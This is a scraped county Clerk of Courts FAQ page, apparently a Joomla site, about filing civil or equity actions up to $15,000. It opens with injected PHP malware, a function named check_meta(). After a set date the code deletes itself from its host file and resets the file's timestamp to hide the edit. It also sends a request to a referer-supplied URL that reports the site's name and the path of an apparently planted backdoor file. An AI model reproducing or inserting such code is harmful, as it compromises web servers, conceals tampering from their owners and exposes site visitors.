check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456736233){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } How do I file a Civil or Equity Action (up to $15,000)?
Home County Civil FAQ's How do I file a Civil or Equity Action (up to $15,000)?

More... Quick Links

How do I file a Civil or Equity Action (up to $15,000)?

Civil Actions are filed in the County Civil Division, but the Clerk's Office cannot help you with any
paperwork. Please consult your Attorney.

***Please understand that Judges, Judicial Assistants, Clerks of Court,
and Sheriff's Department employees CANNOT practice law or give you
legal advice. They can ONLY point out the existence of certain procedures,
but CANNOT tell you how to follow them or how effective they will be. ONLY
A LAWYER CAN GIVE YOU LEGAL ADVICE. You should talk with a lawyer
if you have any questions about your rights.

Copyright © 2018 Clerk of Courts. All Rights Reserved.
Joomla! is Free Software released under the GNU/GPL License.
To protect your privacy, please read the Putnam County Email Privacy Policy.

Information on this website does not constitute the Official Court Records maintained by the Clerk.